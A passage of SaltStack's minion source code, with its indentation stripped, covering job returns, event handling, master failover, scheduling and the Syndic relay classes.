'''
if not isinstance(rets, list):
rets = [rets]
jids = {}
for ret in rets:
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: %s', jid)
load = jids.setdefault(jid, {})
if ret_cmd == '_syndic_return':
if not load:
load.update({'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__'),
'return': {}})
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load.update({'id': self.opts['id']})
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error(
'Invalid outputter %s. This is likely a bug.',
ret['out']
)
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
salt.utils.minion.cache_jobs(self.opts, load['jid'], ret)
load = {'cmd': ret_cmd,
'load': list(six.itervalues(jids))}
def timeout_handler(*_):
log.warning(
'The minion failed to return the job information for job %s. '
'This is often due to the master being shut down or '
'overloaded. If the master is running, consider increasing '
'the worker_threads value.', jid
)
return True
if sync:
try:
ret_val = self._send_req_sync(load, timeout=timeout)
except SaltReqTimeoutError:
timeout_handler()
return ''
else:
with tornado.stack_context.ExceptionStackContext(timeout_handler):
ret_val = self._send_req_async(load, timeout=timeout, callback=lambda f: None) # pylint: disable=unexpected-keyword-arg
log.trace('ret_val = %s', ret_val) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
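
Example ``opts`` value that runs a highstate on start-up (a sketch;
``sls`` and ``top`` are the other values handled below):

.. code-block:: python

    opts['startup_states'] = 'highstate'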
'''
if self.opts['startup_states']:
if self.opts.get('master_type', 'str') == 'disable' and \
self.opts.get('file_client', 'remote') == 'remote':
log.warning(
'Cannot run startup_states when \'master_type\' is set '
'to \'disable\' and \'file_client\' is set to '
'\'remote\'. Skipping.'
)
else:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to False in Sodium release.
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# send name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify=%s', notify)
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def beacons_refresh(self):
'''
Refresh the beacons.
'''
log.debug('Refreshing beacons.')
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def matchers_refresh(self):
'''
Refresh the matchers
'''
log.debug('Refreshing matchers.')
self.matchers = salt.loader.matchers(self.opts)
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
if self.connected:
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Manage the minion's schedule (add, modify, delete, enable or disable jobs) based on an event payload.
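
Example event ``data`` payload consumed here (a sketch; the schedule
entry itself is illustrative):

.. code-block:: python

    {'func': 'add',
     'persist': True,
     'schedule': {'job1': {'function': 'test.ping', 'seconds': 3600}}}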
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
funcs = {'delete': ('delete_job', (name, persist)),
'add': ('add_job', (schedule, persist)),
'modify': ('modify_job',
(name, schedule, persist)),
'enable': ('enable_schedule', ()),
'disable': ('disable_schedule', ()),
'enable_job': ('enable_job', (name, persist)),
'disable_job': ('disable_job', (name, persist)),
'postpone_job': ('postpone_job', (name, data)),
'skip_job': ('skip_job', (name, data)),
'reload': ('reload', (schedule,)),
'list': ('list', (where,)),
'save_schedule': ('save_schedule', ()),
'get_next_fire_time': ('get_next_fire_time',
(name,))}
# Call the appropriate schedule function
try:
alias, params = funcs.get(func)
getattr(self.schedule, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.scheduler',
func)
def manage_beacons(self, tag, data):
'''
Manage Beacons
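
Example event ``data`` payload consumed here (a sketch; the beacon
configuration itself is illustrative):

.. code-block:: python

    {'func': 'add',
     'name': 'load',
     'beacon_data': [{'averages': {'1m': [0.0, 2.0]}}]}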
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
include_pillar = data.get('include_pillar', None)
include_opts = data.get('include_opts', None)
funcs = {'add': ('add_beacon', (name, beacon_data)),
'modify': ('modify_beacon', (name, beacon_data)),
'delete': ('delete_beacon', (name,)),
'enable': ('enable_beacons', ()),
'disable': ('disable_beacons', ()),
'enable_beacon': ('enable_beacon', (name,)),
'disable_beacon': ('disable_beacon', (name,)),
'list': ('list_beacons', (include_opts,
include_pillar)),
'list_available': ('list_available_beacons', ()),
'validate_beacon': ('validate_beacon', (name,
beacon_data)),
'reset': ('reset', ())}
# Call the appropriate beacon function
try:
alias, params = funcs.get(func)
getattr(self.beacons, alias)(*params)
except TypeError:
log.error('Function "%s" is unavailable in salt.utils.beacons',
func)
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
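
Example event ``data`` payload consumed here (a sketch):

.. code-block:: python

    {'environ': {'FOO': 'bar'}, 'false_unsets': False, 'clear_all': False}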
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This %s was scheduled to stop. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
elif self._running is True:
log.error(
'This %s is already running. Not running %s.tune_in()',
self.__class__.__name__, self.__class__.__name__
)
return
try:
log.info(
'%s is starting as user \'%s\'',
self.__class__.__name__, salt.utils.user.get_user()
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.platform.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting %s',
self.__class__.__name__,
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
def _handle_tag_module_refresh(self, tag, data):
'''
Handle a module_refresh event
'''
self.module_refresh(
force_refresh=data.get('force_refresh', False),
notify=data.get('notify', False)
)
@tornado.gen.coroutine
def _handle_tag_pillar_refresh(self, tag, data):
'''
Handle a pillar_refresh event
'''
yield self.pillar_refresh(
force_refresh=data.get('force_refresh', False)
)
def _handle_tag_beacons_refresh(self, tag, data):
'''
Handle a beacon_refresh event
'''
self.beacons_refresh()
def _handle_tag_matchers_refresh(self, tag, data):
'''
Handle a matchers_refresh event
'''
self.matchers_refresh()
def _handle_tag_manage_schedule(self, tag, data):
'''
Handle a manage_schedule event
'''
self.manage_schedule(tag, data)
def _handle_tag_manage_beacons(self, tag, data):
'''
Handle a manage_beacons event
'''
self.manage_beacons(tag, data)
def _handle_tag_grains_refresh(self, tag, data):
'''
Handle a grains_refresh event
'''
if (data.get('force_refresh', False) or
self.grains_cache != self.opts['grains']):
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
def _handle_tag_environ_setenv(self, tag, data):
'''
Handle a environ_setenv event
'''
self.environ_setenv(tag, data)
def _handle_tag_minion_mine(self, tag, data):
'''
Handle a _minion_mine event
'''
self._mine_send(tag, data)
def _handle_tag_fire_master(self, tag, data):
'''
Handle a fire_master event
'''
if self.connected:
log.debug('Forwarding master event tag=%s', data['tag'])
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
def _handle_tag_master_disconnected_failback(self, tag, data):
'''
Handle a master_disconnected_failback event
'''
# if the master disconnect event is for a different master, ignore it
if tag.startswith(master_event(type='disconnected')) and data['master'] != self.opts['master']:
# not mine master, ignore
return
if tag.startswith(master_event(type='failback')):
# if the master failback event is not for the top master, raise an exception
if data['master'] != self.opts['master_list'][0]:
raise SaltException('Bad master \'{0}\' in failback event (currently connected to \'{1}\')'.format(
data['master'], self.opts['master']))
# if the master failback event is for the current master, raise an exception
elif data['master'] == self.opts['master'][0]:
raise SaltException('Already connected to \'{0}\''.format(data['master']))
if self.connected:
# we are not connected anymore
self.connected = False
log.info('Connection to master %s lost', self.opts['master'])
# we can't use the config default here because the default '0' value is overloaded
# to mean 'if 0 disable the job', but when salt detects a timeout it also sets up
# these jobs
master_alive_interval = self.opts['master_alive_interval'] or 60
if self.opts['master_type'] != 'failover':
# modify the scheduled job to fire on reconnect
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
# delete the scheduled job so it does not interfere with the failover process
if self.opts['transport'] != 'tcp':
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']),
persist=True)
log.info('Trying to tune in to next master from master-list')
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'auth'):
self.pub_channel.auth.invalidate()
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
try:
master, self.pub_channel = yield self.eval_master(
opts=self.opts,
failed=True,
failback=tag.startswith(master_event(type='failback')))
except SaltClientError:
pass
if self.connected:
self.opts['master'] = master
# re-init the subsystems to work with the new master
log.info(
'Re-initialising subsystems for new master %s',
self.opts['master']
)
# put the current schedule into the new loaders
self.opts['schedule'] = self.schedule.option('schedule')
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# make the schedule use the new 'functions' loader
self.schedule.functions = self.functions
self.pub_channel.on_recv(self._handle_payload)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
if self.opts['transport'] != 'tcp':
schedule = {
'function': 'status.master',
'seconds': master_alive_interval,
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
if self.opts['master_failback'] and 'master_list' in self.opts:
if self.opts['master'] != self.opts['master_list'][0]:
schedule = {
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
self.schedule.modify_job(name=master_event(type='failback'),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='failback'), persist=True)
else:
self.restart = True
self.io_loop.stop()
def _handle_tag_master_connected(self, tag, data):
'''
Handle a master_connected event
'''
# handle this event only once, otherwise it will pollute the log.
# Also, if master_type is failover, all of the reconnection work is done
# by the `disconnected` event handler, so this event should never happen;
# check it anyway to be sure
if not self.connected and self.opts['master_type'] != 'failover':
log.info('Connection to master %s re-established', self.opts['master'])
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
if self.opts['transport'] != 'tcp':
if self.opts['master_alive_interval'] > 0:
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name=master_event(type='alive', master=self.opts['master']),
schedule=schedule)
else:
self.schedule.delete_job(name=master_event(type='alive', master=self.opts['master']), persist=True)
def _handle_tag_schedule_return(self, tag, data):
'''
Handle a _schedule_return event
'''
# reporting current connection with master
if data['schedule'].startswith(master_event(type='alive', master='')):
if data['return']:
log.debug(
'Connected to master %s',
data['schedule'].split(master_event(type='alive', master=''))[1]
)
self._return_pub(data, ret_cmd='_return', sync=False)
def _handle_tag_salt_error(self, tag, data):
'''
Handle a _salt_error event
'''
if self.connected:
log.debug('Forwarding salt error event tag=%s', tag)
self._fire_master(data, tag)
def _handle_tag_salt_auth_creds(self, tag, data):
'''
Handle a salt_auth_creds event
'''
key = tuple(data['key'])
log.debug(
'Updating auth data for %s: %s -> %s',
key, salt.crypt.AsyncAuth.creds_map.get(key), data['creds']
)
salt.crypt.AsyncAuth.creds_map[tuple(data['key'])] = data['creds']
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
if not self.ready:
raise tornado.gen.Return()
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug(
'Minion of \'%s\' is handling event tag \'%s\'',
self.opts['master'], tag
)
tag_functions = {
'beacons_refresh': self._handle_tag_beacons_refresh,
'environ_setenv': self._handle_tag_environ_setenv,
'fire_master': self._handle_tag_fire_master,
'grains_refresh': self._handle_tag_grains_refresh,
'matchers_refresh': self._handle_tag_matchers_refresh,
'manage_schedule': self._handle_tag_manage_schedule,
'manage_beacons': self._handle_tag_manage_beacons,
'_minion_mine': self._handle_tag_minion_mine,
'module_refresh': self._handle_tag_module_refresh,
'pillar_refresh': self._handle_tag_pillar_refresh,
'salt/auth/creds': self._handle_tag_salt_auth_creds,
'_salt_error': self._handle_tag_salt_error,
'__schedule_return': self._handle_tag_schedule_return,
master_event(type='disconnected'): self._handle_tag_master_disconnected_failback,
master_event(type='failback'): self._handle_tag_master_disconnected_failback,
master_event(type='connected'): self._handle_tag_master_connected,
}
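# Illustrative dispatch (hypothetical event): a local event tagged 'module_refresh'
# matches the 'module_refresh' key above via startswith() and is routed to
# self._handle_tag_module_refresh(tag, data); tags with no matching prefix are ignored.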
# Run the appropriate function
for tag_function in tag_functions:
if tag.startswith(tag_function):
tag_functions[tag_function](tag, data)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.platform.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
def _setup_core(self):
'''
Set up the core minion attributes.
This is safe to call multiple times.
'''
if not self.ready:
# First call. Initialize.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
# self.matcher = Matcher(self.opts, self.functions)
self.matchers = salt.loader.matchers(self.opts)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.grains_cache = self.opts['grains']
self.ready = True
def setup_beacons(self, before_connect=False):
'''
Set up the beacons.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'beacons' not in self.periodic_callbacks:
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
def handle_beacons():
# Process Beacons
beacons = None
try:
beacons = self.process_beacons(self.functions)
except Exception:
log.critical('The beacon errored: ', exc_info=True)
if beacons and self.connected:
self._fire_master(events=beacons)
new_periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(
handle_beacons, loop_interval * 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_beacons()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
def setup_scheduler(self, before_connect=False):
'''
Set up the scheduler.
This is safe to call multiple times.
'''
self._setup_core()
loop_interval = self.opts['loop_interval']
new_periodic_callbacks = {}
if 'schedule' not in self.periodic_callbacks:
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
utils=self.utils,
cleanup=[master_event(type='alive')])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
new_periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000)
if before_connect:
# Make sure there is a chance for one iteration to occur before connect
handle_schedule()
if 'cleanup' not in self.periodic_callbacks:
new_periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(
self._fallback_cleanups, loop_interval * 1000)
# start all the other callbacks
for periodic_cb in six.itervalues(new_periodic_callbacks):
periodic_cb.start()
self.periodic_callbacks.update(new_periodic_callbacks)
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
log.debug('Minion \'%s\' trying to tune in', self.opts['id'])
if start:
if self.opts.get('beacons_before_connect', False):
self.setup_beacons(before_connect=True)
if self.opts.get('scheduler_before_connect', False):
self.setup_scheduler(before_connect=True)
self.sync_connect_master()
if self.connected:
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
if HAS_WIN_FUNCTIONS:
salt.utils.win_functions.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
self.setup_beacons()
self.setup_scheduler()
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0 and self.connected:
def ping_master():
try:
def ping_timeout_handler(*_):
if self.opts.get('auth_safemode', False):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay %ss', delay)
try:
self.functions['service.restart'](service_name())
except KeyError:
# Probably no init system (running in docker?)
log.warning(
'ping_interval reached without response '
'from the master, but service.restart '
'could not be run to restart the minion '
'daemon. ping_interval requires that the '
'minion is running under an init system.'
)
self._fire_master('ping', 'minion_ping', sync=False, timeout_handler=ping_timeout_handler)
except Exception:
log.warning('Attempt to ping master failed.', exc_info_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when the minion sees something it shouldn't
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
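# Illustrative (hypothetical) decoded load this check operates on:
#   {'tgt_type': 'grain', 'tgt': 'os:Ubuntu', 'delimiter': ':',
#    'jid': '20190101010101010101', 'fun': 'test.ping', 'arg': []}
# which dispatches to self.matchers['grain_match.match']('os:Ubuntu', delimiter=':')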
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to false in Sodium release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`):
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way), this daemon does not handle failure well;
under most circumstances it will stall the daemon for ~15s trying to forward events
to the down master.
'''
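# Illustrative (hypothetical) syndic master configuration matching the modes
# described above -- option names follow Salt's syndic settings, values are
# examples only:
#   syndic_master:
#     - master01.example.com
#     - master02.example.com
#   syndic_mode: sync        # or 'cluster' to forward only job publishes/returns
#   syndic_failover: random  # any other value keeps the configured order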
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which we were unable to send for some reason and will be resent to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if it's connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
